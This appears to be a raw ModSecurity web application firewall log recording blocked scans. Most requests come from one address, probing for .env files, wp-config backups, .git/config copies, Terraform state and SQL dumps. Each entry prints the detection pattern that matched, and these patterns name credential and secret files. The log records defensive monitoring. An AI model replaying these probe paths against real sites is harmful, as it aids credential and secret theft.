[Tue May 26 14:17:01.273035 2026] [security2:error] [pid 598542:tid 598609] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/services/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVywAAdEI"]
[Tue May 26 14:17:01.343757 2026] [security2:error] [pid 598542:tid 598639] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/shared/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV0gAAL2A"]
[Tue May 26 14:17:01.378844 2026] [security2:error] [pid 598542:tid 598612] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/shop/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV1gAAS0U"]
[Tue May 26 14:17:01.403956 2026] [security2:error] [pid 598542:tid 598774] [client 114.119.135.196:37913] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cpanel.ghanemgh.com"] [uri "/"] [unique_id "ahVeBf4iWyZxnXeAW3JV2AAAAGY"], referer: https://cpanel.ghanemgh.com/?locale=it
[Tue May 26 14:17:01.419053 2026] [security2:error] [pid 598542:tid 598665] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/src/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV3QAAFHo"]
[Tue May 26 14:17:01.563317 2026] [security2:error] [pid 598542:tid 598587] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/srv/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV7QAAICw"]
[Tue May 26 14:17:01.564192 2026] [security2:error] [pid 598542:tid 598632] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/stage/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV7gAAIFk"]
[Tue May 26 14:17:01.565642 2026] [security2:error] [pid 598542:tid 598628] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/staging/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV7wAAIFU"]
[Tue May 26 14:17:01.584284 2026] [security2:error] [pid 598542:tid 598657] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/stg/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV9AAAa3I"]
[Tue May 26 14:17:01.677570 2026] [security2:error] [pid 598542:tid 598641] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/stripe/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV_gAAGGI"]
[Tue May 26 14:17:01.728970 2026] [security2:error] [pid 598542:tid 598635] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVeBf4iWyZxnXeAW3JWBQAAH1w"]
[Tue May 26 14:17:01.761124 2026] [security2:error] [pid 598542:tid 598634] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/test.php"] [unique_id "ahVeBf4iWyZxnXeAW3JWCQAAFls"]
[Tue May 26 14:17:01.794277 2026] [security2:error] [pid 598542:tid 598666] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/test/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWCgAAQXs"]
[Tue May 26 14:17:01.823039 2026] [security2:error] [pid 598542:tid 598655] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/user/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWDgAAAnA"]
[Tue May 26 14:17:01.863917 2026] [security2:error] [pid 598542:tid 598596] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/v2/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWFAAAKjU"]
[Tue May 26 14:17:01.864406 2026] [security2:error] [pid 598542:tid 598636] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/v1/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWEgAAKl0"]
[Tue May 26 14:17:01.873820 2026] [security2:error] [pid 598542:tid 598549] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/v3/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWGAAACAY"]
[Tue May 26 14:17:02.028693 2026] [security2:error] [pid 598542:tid 598569] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/var/www/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWLwAARRo"]
[Tue May 26 14:17:02.039946 2026] [security2:error] [pid 598542:tid 598586] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/var/www/html/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWMAAALSs"]
[Tue May 26 14:17:02.045577 2026] [security2:error] [pid 598542:tid 598575] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/web/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWMwAALSA"]
[Tue May 26 14:17:02.186217 2026] [security2:error] [pid 598542:tid 598555] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/website/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWQwAAcww"]
[Tue May 26 14:17:02.192121 2026] [security2:error] [pid 598542:tid 598669] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php"] [unique_id "ahVeBv4iWyZxnXeAW3JWRQAAYH4"]
[Tue May 26 14:17:02.195568 2026] [security2:error] [pid 598542:tid 598594] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php.bak"] [unique_id "ahVeBv4iWyZxnXeAW3JWRgAAYDM"]
[Tue May 26 14:17:02.212935 2026] [security2:error] [pid 598542:tid 598589] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php.new"] [unique_id "ahVeBv4iWyZxnXeAW3JWRwAAOi4"]
[Tue May 26 14:17:02.246500 2026] [security2:error] [pid 598542:tid 598592] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php.old"] [unique_id "ahVeBv4iWyZxnXeAW3JWSAAARzE"]
[Tue May 26 14:17:02.264091 2026] [security2:error] [pid 598542:tid 598580] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVeBv4iWyZxnXeAW3JWSgAAMyU"]
[Tue May 26 14:17:02.343801 2026] [security2:error] [pid 598542:tid 598646] [remote 216.73.216.240:32968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-products.php"] [unique_id "ahVeBv4iWyZxnXeAW3JWWAAAF2c"]
[Tue May 26 14:17:02.485615 2026] [security2:error] [pid 598542:tid 598757] [client 45.148.10.95:1312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWYgAAAFU"]
[Tue May 26 14:17:02.539926 2026] [security2:error] [pid 598542:tid 598691] [client 45.148.10.95:1336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.dimcorp.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVeBv4iWyZxnXeAW3JWZAAAABM"]
[Tue May 26 14:17:02.569283 2026] [security2:error] [pid 598542:tid 598782] [client 45.148.10.95:1366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWaAAAAG4"]
[Tue May 26 14:17:02.694834 2026] [security2:error] [pid 598542:tid 598788] [client 202.76.168.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeBv4iWyZxnXeAW3JWTgAAAHQ"]
[Tue May 26 14:17:02.712594 2026] [security2:error] [pid 598542:tid 598701] [client 45.148.10.95:1292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWcAAAAB0"]
[Tue May 26 14:17:02.718058 2026] [security2:error] [pid 598542:tid 598703] [client 45.148.10.95:1302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWcgAAAB8"]
[Tue May 26 14:17:02.786244 2026] [security2:error] [pid 598542:tid 598795] [client 45.148.10.95:1426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVeBv4iWyZxnXeAW3JWeAAAAHs"]
[Tue May 26 14:17:02.867087 2026] [security2:error] [pid 598542:tid 598789] [client 45.148.10.95:1302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWfgAAAHU"]
[Tue May 26 14:17:02.955913 2026] [security2:error] [pid 598542:tid 598675] [client 45.148.10.95:1292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVeBv4iWyZxnXeAW3JWhgAAAAM"]
[Tue May 26 14:17:03.030269 2026] [security2:error] [pid 598542:tid 598730] [client 45.148.10.95:1476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWjQAAADo"]
[Tue May 26 14:17:03.086868 2026] [security2:error] [pid 598542:tid 598723] [client 45.148.10.95:1592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVeB_4iWyZxnXeAW3JWkQAAADM"]
[Tue May 26 14:17:03.116523 2026] [security2:error] [pid 598542:tid 598686] [client 45.148.10.95:1540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVeB_4iWyZxnXeAW3JWlAAAAA4"]
[Tue May 26 14:17:03.338668 2026] [security2:error] [pid 598542:tid 598793] [client 45.148.10.95:1592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env~"] [unique_id "ahVeB_4iWyZxnXeAW3JWoAAAAHk"]
[Tue May 26 14:17:03.446852 2026] [security2:error] [pid 598542:tid 598778] [client 45.148.10.95:1722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVeB_4iWyZxnXeAW3JWrgAAAGo"]
[Tue May 26 14:17:03.487067 2026] [security2:error] [pid 598542:tid 598745] [client 173.239.240.47:23331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWnQAAAEk"]
[Tue May 26 14:17:03.538344 2026] [security2:error] [pid 598542:tid 598795] [client 45.148.10.95:1794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVeB_4iWyZxnXeAW3JWtwAAAHs"]
